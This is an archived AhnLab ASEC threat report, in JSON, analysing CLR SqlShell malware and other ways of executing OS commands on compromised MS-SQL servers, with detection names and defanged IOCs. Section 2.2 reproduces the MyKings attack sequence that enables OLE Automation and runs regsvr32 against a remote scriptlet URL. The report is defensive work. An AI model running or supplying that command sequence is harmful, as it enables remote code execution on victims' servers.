{
	"id": "0026b5c6-a611-41c7-9034-cff1b6addace",
	"created_at": "2026-04-06T00:12:19.092301Z",
	"updated_at": "2026-04-10T03:22:09.959376Z",
	"deleted_at": null,
	"sha1_hash": "c2e50be006824ea9f322d2687130a3e633a14182",
	"title": "Analysis of CLR SqlShell Used to Attack MS-SQL Servers - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6230025,
	"plain_text": "Analysis of CLR SqlShell Used to Attack MS-SQL Servers - ASEC\r\nBy ATCP\r\nPublished: 2023-05-01 · Archived: 2026-04-05 14:09:41 UTC\r\nThis blog post analyzes the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that, once installed on an MS-SQL server, supports various features such as executing commands from threat actors and carrying out all sorts of malicious behavior. MS-SQL servers support a method known as CLR Stored Procedure which allows the usage of expanded features, and SqlShell is a DLL created with this method. Along with the xp_cmdshell command, CLR Stored Procedure is one of the major methods that threat actors can use to execute malicious commands on MS-SQL servers.\r\nSince CLR Stored Procedure is a legitimate feature for executing given commands, it is possible that a given SqlShell was created for a legitimate purpose. However, it is being used in almost all attacks that target MS-SQL servers. Threat actors typically use SqlShell as a means to ultimately install malware such as CoinMiner or ransomware. In this blog post, we will analyze and cover the features supported by various types of SqlShells and the actual cases where they were used in attacks.\r\n1. Overview\r\nMS-SQL servers that have simple passwords and are publicly exposed to the external Internet are one of the main attack vectors used when targeting Windows systems. Threat actors find poorly managed MS-SQL servers by scanning and then carry out brute force or dictionary attacks to log in with admin privileges. Once the threat actors have reached this point, they utilize various means to install malware and gain control over the infected systems.\r\nAfter a threat actor logs in to an MS-SQL server with an admin account, the most common method used to install malware involves the xp_cmdshell command. 
Windows commands, malicious ones included, can be executed through this command. In addition, other means of executing Windows commands exist, such as registering commands in the OLE Stored Procedure or registering malicious commands as tasks in MS-SQL Agent Jobs. Aside from the aforementioned command execution methods, another technique exists where an executable implementing specific features is created, registered, and made to perform those features. MS-SQL servers support Extended Stored Procedure and CLR Stored Procedure DLLs for such expanded features, allowing developers to provide certain features by creating and registering DLLs with their desired functionality.\r\nAhnLab Security Emergency response Center (ASEC) has published quarterly statistics through the ASEC Report on malware strains that have been used in attacks against poorly managed MS-SQL servers. [1] According to the statistics, there is a considerable amount of malware categorized as CLR Shell (SqlShell). All of these are malware in the form of CLR Stored Procedure DLLs. Instead of using these pieces of malware on their own, most threat actors use them during the installation process of other malware, such as ransomware and CoinMiner.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 1 of 16\n\nThe above figure covers the features provided by MS-SQL servers that can execute Windows OS commands and categorizes them by the actual malware that uses them. SqlShells come in various forms, some of which can execute commands, download/upload files, and even perform privilege escalation. Naturally, instead of receiving the threat actor’s commands, they also come in the form of downloaders that download and install malware from specific URLs.\r\n2. Attack Methods Against MS-SQL\r\nGenerally, threat actors and malware search for environments where the MS-SQL service is installed by scanning for servers with port 1433 open. 
After the scanning process, they attempt to log in to the confirmed MS-SQL server through brute force or dictionary attacks. Additionally, most features that make it possible to execute Windows OS commands require an SQL Admin (sa), in other words, an admin account.\r\nThere are cases where the threat actor does not personally perform the scan and dictionary attack, but instead the malware spreads by self-propagating to poorly managed MS-SQL servers. The most notable example is the LemonDuck CoinMiner. The following is a list of sa account passwords used by LemonDuck when performing dictionary attacks.\r\nIn addition, while LemonDuck uses dictionary attacks on MS-SQL servers during its internal propagation process, also known as lateral movement, Kingminer [2] and Vollgar CoinMiner [3] employ brute force attacks on externally accessible MS-SQL servers.\r\nAfter obtaining an sa account or sa account privileges, the threat actor or malware either executes malicious commands or installs the actual malware to obtain control over the infected system. Note that sa account privileges only grant control over the MS-SQL database server, not the Windows OS itself. In other words, although the execution of SQL commands is allowed, features that can directly impact the Windows OS are not provided by default.\r\nHowever, MS-SQL provides various features that allow the execution of OS commands on the Windows host, and abusing them ultimately allows the execution of OS commands. The section below covers the methods that allow the execution of OS commands through MS-SQL database servers. Because these features are not default SQL commands and pose security risks, most of them are disabled by default. However, admin accounts can enable these settings, meaning that logging in with an admin account makes it possible to access these features. 
Therefore, control over the Windows OS can be obtained as a result of acquiring an sa account.\r\n2.1. xp_cmdshell\r\nThe xp_cmdshell command executes the command received as its argument in the Windows shell. Windows commands executed via xp_cmdshell are run as “cmd.exe /c” commands by the sqlservr.exe process.\r\nAmong actual malware, LemonDuck downloads additional malware by utilizing xp_cmdshell. LemonDuck is also prepared for cases where xp_cmdshell has been unregistered rather than merely disabled, as it also includes a re-registration process.\r\n2.2. OLE Stored Procedure\r\nThe method that uses the OLE Stored Procedure involves abusing OLE’s ability to execute other applications, in this case the malicious commands or malware. OLE Automation is disabled by default like the xp_cmdshell command, so it must be enabled as well.\r\nThe following is a reproduction of the actual attack routine used by the MyKings CoinMiner malware.\r\nCMD \u003e sqlcmd -S [IP address] -U sa -P testsql\r\n1\u003e sp_configure ‘show advanced options’, 1;\r\n2\u003e RECONFIGURE;\r\n3\u003e go\r\n1\u003e sp_configure ‘Ole Automation Procedures’,1;\r\n2\u003e RECONFIGURE;\r\n3\u003e go\r\n1\u003e DECLARE @shell INT\r\n2\u003e EXEC SP_OAcreate ‘{72C24DD5-D70A-438B-8A42-98424B88AFB8}’,@shell OUTPUT\r\n3\u003e EXEC SP_OAMETHOD @shell,’run’,null, ‘regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll’;\r\n4\u003e go\r\n2.3. MS-SQL Agent Jobs\r\nLike the methods mentioned above, the feature called MS-SQL Agent Jobs allows the registration of tasks that execute Windows commands. SQL Server Agent supports the simple CmdExec method that executes OS commands, and the ActiveScripting method that makes it possible to use JS or VBS scripts.\r\n2.4. 
Extended Stored Procedure\r\nMS-SQL servers support a method called the Extended Stored Procedure in order to provide an expanded range of features. Threat actors create malicious DLLs, register them with the sp_addextendedproc command, and then execute the registered export function, which loads the malicious DLL and runs the export function responsible for the malicious behavior.\r\n2.5. CLR Stored Procedure\r\nThe CLR Stored Procedure is similar to the Extended Stored Procedure above, but is distinguished by its use of .NET DLLs. In addition, an activation process like that for xp_cmdshell is required to register and use CLR Stored Procedures.\r\nAs mentioned above, LemonDuck uses not only xp_cmdshell but also the CLR Stored Procedure.\r\n3. CLR SqlShell Analysis\r\n3.1. Basic Type\r\nThis section covers SqlShells that only provide basic features such as command execution and file download. SqlShell is often used to install additional malware during attack processes, so even these simple forms are often found during attacks.\r\n3.1.1. Command Execution (LEMONDUCK)\r\nLemonDuck registers and uses the ExecCommand() method of the StoredProcedures class, and the ExecCommand() method internally calls the RunCommand() method. The DLL, named evilclr.dll, contains nothing but a command execution routine. LemonDuck uses the CLR assembly’s ExecCommand() function registered in this way to download additional payloads.\r\n3.1.2. Download Command Support (SHAW20211224)\r\nNext is a SqlShell named “shaw20211224.dll” which provides not only the RunCommand() function that executes received commands, but also the DownloadRun() function that downloads external files, and the PutDatas() function that steals files from the received directories.\r\n3.1.3. 
Shellcode Execution (Metasploit)\r\nAdditionally, Metasploit, a penetration testing tool, also supports attacks that target MS-SQL servers. Metasploit provides various techniques ranging from the aforementioned dictionary attacks and privilege escalation to executing various OS commands, and the CLR SqlShell technique is also provided.\r\nMetasploit installs the following SqlShell during the attack process, which is responsible for executing the received shellcode in memory. Metasploit also provides simple forms of reverse shell and bind shell, as well as the Meterpreter backdoor which provides various other features. Metasploit executes shellcode that installs the threat actor’s desired malware.\r\nThe following figure is a log from our AhnLab Smart Defense (ASD), which shows a threat actor breaching a poorly managed MS-SQL server and installing Metasploit’s “SqlClrPayload.dll” before executing Metasploit’s Meterpreter backdoor in the memory of the sqlservr.exe process.\r\n3.2. Types That Provide Extended Features\r\nThe SqlShells covered above have relatively simple forms, but threat actors are capable of utilizing SqlShells with a much broader range of features. The more features that are provided, the easier it becomes for threat actors to perform malicious behaviors such as malware installation.\r\n3.2.1. SQLHELPER (TRIGONA Ransomware)\r\nMost notably, a SqlShell named SqlHelper is also often used in attacks. Due to the high number of variations, it is believed that the source code is publicly available. 
Even the relatively simple variant shown below provides various features such as command execution, adding user accounts, tunneling, and file handling.\r\nIn addition, the SqlShell found in the previously covered Trigona ransomware [4] attack case was also SqlHelper. The SqlHelper used by the Trigona threat actor also contains an attack routine for the MS16-032 vulnerability for privilege escalation. The threat actor used this to execute the MS-SQL service with escalated privileges, and with that privilege, they registered the Trigona ransomware as a service.\r\n3.2.2. CLRSQL (SHADOWFORCE Threat Group)\r\nThe SqlShell named CLRSQL is also similar to SqlHelper. Looking at the supported functions, such as tasks related to files/directories/processes/accounts, its similarity to WebShell malware is apparent.\r\nCompared to the types covered above, CLRSQL SqlShells have even more features. For example, some have been implemented with PingCastle. PingCastle is a tool that can be used to collect information required for attacks in Active Directory environments.\r\nThe CLRSQL SqlShell implemented with PingCastle is also used during the ShadowForce threat group’s attack processes. ShadowForce is a threat group that has been active since 2013. They are known for attacks focused on Korean businesses and agencies, and their tendency to mainly attack MS-SQL servers is one of their defining characteristics. [5]\r\nJudging from how other malware that targets poorly managed MS-SQL servers is also found in systems attacked by ShadowForce, it can be inferred that ShadowForce also targets systems that use poor account credentials.\r\nThe ASD log below shows the sequential creation of ShadowForce’s other malware after “Tmp1C4E.tmp”, which is the SqlShell, has been installed first. 
As such, ShadowForce uses CLR Stored Procedure malware to install additional malware after breaching poorly managed MS-SQL servers. This flow of events can be observed similarly in most of their attack processes.\r\n3.2.3. CLR_MODULE (SHADOWFORCE Threat Group)\r\nThe SqlShell named CLR_module is also similar to CLRSQL as it supports PingCastle along with other similar features. As for differences, CLR_module also provides privilege escalation tools such as BadPotato and EfsPotato in addition to the features provided by CLRSQL. It can be assumed that these additional features are the reason why there are many cases where CLRSQL is also found during the attack processes of ShadowForce.\r\n3.3. CoinMiner Installation\r\nThe section above covered the WebShell-like form that receives and executes specific commands from the threat actor. This section covers SqlShells implemented with their own fixed features. Most of these forms aim to install CoinMiner, and therefore the SqlShells used in these attacks usually function as downloaders or droppers.\r\n3.3.1. MRBMINER\r\nMrbMiner was one of the main CoinMiners distributed to MS-SQL servers in the past. [6] It was first confirmed in 2020, and it ultimately installs XMRig CoinMiner. The SqlShell used during the installation process of MrbMiner has its own analysis disruption techniques, but unlike the forms mentioned above, it only has a download feature to install MrbMiner.\r\nAlthough they may vary according to the version, the following hard-coded C\u0026C URLs can be directly confirmed.\r\n3.3.2. MYKINGS\r\nMyKings CoinMiner is distributed through various means, and is used in several methods of attack against MS-SQL servers as well. 
The first method is the OLE Stored Procedure covered above, and there are other methods like the following, where a CLR assembly is used via the ExecCode.dll file.\r\nThe SqlStoredProcedure1() method downloads a text file from a specific URL, which contains URLs where additional payloads can be downloaded. Afterward, it parses these URLs to install the actual MyKings payload.\r\nExecCode.dll has a simple form like the one shown above, but more complex forms have been discovered among the CLR assemblies used by MyKings.\r\nSimilar to ExecCode.dll, MSSqlInterface.dll is also executed through the StoredProcedures class and the SqlStoredProcedure() method, but it provides additional features. First, during its initial routine it decrypts the C\u0026C URL, which is encoded with a 1-byte XOR using the key 0xFA. It then regularly sends the stolen basic system information to the C\u0026C server in its main loop, and downloads and executes files and shellcode.\r\n3.3.3. LOVEMINER\r\nLoveMiner is a CoinMiner distributed to vulnerable MS-SQL servers, and it has been found with downloaders in the form of exe executables and CLR Stored Procedures. [7]\r\nThe LoveMiner downloader accesses a specific URL, downloads a Base64-encoded CoinMiner, and saves it to the “C:\\windows\\temp\\0c0134c0cbebf48be8c95920f5ea74fc.txt” path. If the file already exists, it reads the file, decodes the Base64, and loads the result into memory.\r\nAfter ultimately loading the CoinMiner DLL, the ExecSql() export function is called with arguments. This DLL is a customized XMRig that checks whether the first string received as an argument is “getmoney#2021”. 
Afterward, it mines Monero after parsing the mining pool address and ID received as the third argument.\r\nAmong the SqlShells that install LoveMiner, some even come in the form of a dropper instead of a downloader. The XMRig CoinMiner is saved in the “gmp” internal resource, and the SqlShell is responsible for loading it into memory. As a customized XMRig, gmp configures the information required for mining, such as the mining pool address, in its initial routine.\r\n3.4. Proxyware Installation\r\nProxyware is a program that shares a part of the Internet bandwidth currently available on a system with others. Users who install the program are usually paid a certain amount of cash in exchange for providing the bandwidth. While users can earn some money by installing proxyware on their systems, they should know they are taking risks by allowing external users to perform certain behaviors through their networks. For instance, users cannot know in detail which companies the proxyware platforms claim as users of their services. Even if the platforms verify their customers on their own, it is impossible to check whether your bandwidth will be maliciously exploited in the future.\r\nMalware that installs proxyware without the consent of users has been covered before here on the ASEC Blog. [8] Systems infected with the malware have their network bandwidth stolen so that threat actors can profit. This method of earning profit by using the infected system’s resources is similar to that of CoinMiner.\r\nAs can be seen in the ASD log, the threat actor installed proxyware with the name “sdk.mdf” on an MS-SQL server and used a SqlShell to execute the proxyware and steal bandwidth. 
“sdk.mdf” is the DLL file responsible for the actual features, and the file itself only possesses the features provided by proxyware platforms. However, the “Tmp417C.tmp” SqlShell that is created together with it loads the proxyware “sdk.mdf” and calls the p2p_start() export function so that it operates without the user’s knowledge. When calling p2p_start(), the email address that receives the profits must be passed as an argument, and the threat actor’s email address can be confirmed in the following figure.\r\nAdditionally, the name of the SqlShell is “SqlServerWorks.CLR.P2P.dll”, which is similar to LoveMiner’s SqlShell, and it is assumed that they belong to the same threat actor, as actual ASD logs have shown that LoveMiner and proxyware are often installed together.\r\n4. Conclusion\r\nRecently, SqlShell malware has been installed on poorly managed MS-SQL database servers. SqlShell can install additional malware such as backdoors, CoinMiners, and proxyware, or it can execute malicious commands received from threat actors in a way similar to WebShell.\r\nTypical attacks that target MS-SQL database servers include brute force and dictionary attacks on systems where account credentials are poorly managed. Among the MS-SQL servers targeted for attacks, there are many cases where the server was installed together with ERP and business solutions during their installation process, in addition to servers directly set up as database servers.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute force and dictionary attacks, and apply the latest patches to prevent vulnerability attacks. 
They should also use security programs such as firewalls for database servers accessible from outside to restrict access by threat actors.\r\nFile Detection\r\n– CoinMiner/Win.Generic.R503247 (2022.07.08.00)\r\n– CoinMiner/Win.Generic.R531037 (2022.10.20.02)\r\n– CoinMiner/Win.Generic.R548410 (2023.01.04.01)\r\n– Downloader/Win.MyKings.C2097492 (2022.03.28.03)\r\n– Downloader/Win.MyKings.C4262789 (2022.03.28.03)\r\n– Malware/Win.Generic.C4624149 (2021.09.06.02)\r\n– Trojan/Win.Generic.C4819385 (2021.12.08.01)\r\n– Trojan/Win.Generic.C4977493 (2022.02.22.00)\r\n– Trojan/Win.LEMONDUCK.C4206511 (2022.02.17.01)\r\n– Trojan/Win.SqlShell.C4975954 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975955 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975957 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975960 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975962 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C5109399 (2022.05.02.01)\r\n– Trojan/Win.SqlShell.C5271966 (2022.10.04.02)\r\n– Trojan/Win.SqlShell.C5310256 (2022.11.21.03)\r\n– Trojan/Win.SqlShell.C5310259 (2022.11.21.03)\r\n– Trojan/Win.SqlShell.R473182 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.R473183 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.R489848 (2022.05.02.01)\r\n– Trojan/Win.SqlShell.R535294 (2022.11.21.03)\r\n– Trojan/Win.SqlShell.R546675 (2022.12.28.03)\r\n– Trojan/Win.SqlShell.R549834 (2023.01.09.03)\r\n– Trojan/Win.SqlShell.R567705 (2023.04.04.01)\r\n– Trojan/Win.SqlShell.R576151 (2023.05.02.02)\r\nMD5\r\n012e607f99ecc5b108b292d72938456a\r\n130d2b07a1c4cde8f0804df9fa9622d4\r\n15c87480e0405b41f675222ef2bea95a\r\n17606de13187c780ad3bf6caf2d1bd8c\r\n1e92e397d0ad3d8006d99f81d913ffa1\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//54[.]36[.]10[.]73[:]1001/\r\nhttp[:]//88[.]214[.]26[.]9[:]13785/\r\nhttp[:]//adminserver[.]online[:]1001/\r\nhttp[:]//c[.]getmoney[.]company/CLRV7/data[.]txt\r\nhttp[:]//c[.]getmoney[.]company/CLRV7/ver[.]txt\r\nAdditional IOCs are 
available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/52479/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/52479/"
	],
	"report_names": [
		"52479"
	],
	"threat_actors": [],
	"ts_created_at": 1775434339,
	"ts_updated_at": 1775791329,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c2e50be006824ea9f322d2687130a3e633a14182.pdf",
		"text": "https://archive.orkl.eu/c2e50be006824ea9f322d2687130a3e633a14182.txt",
		"img": "https://archive.orkl.eu/c2e50be006824ea9f322d2687130a3e633a14182.jpg"
	}
}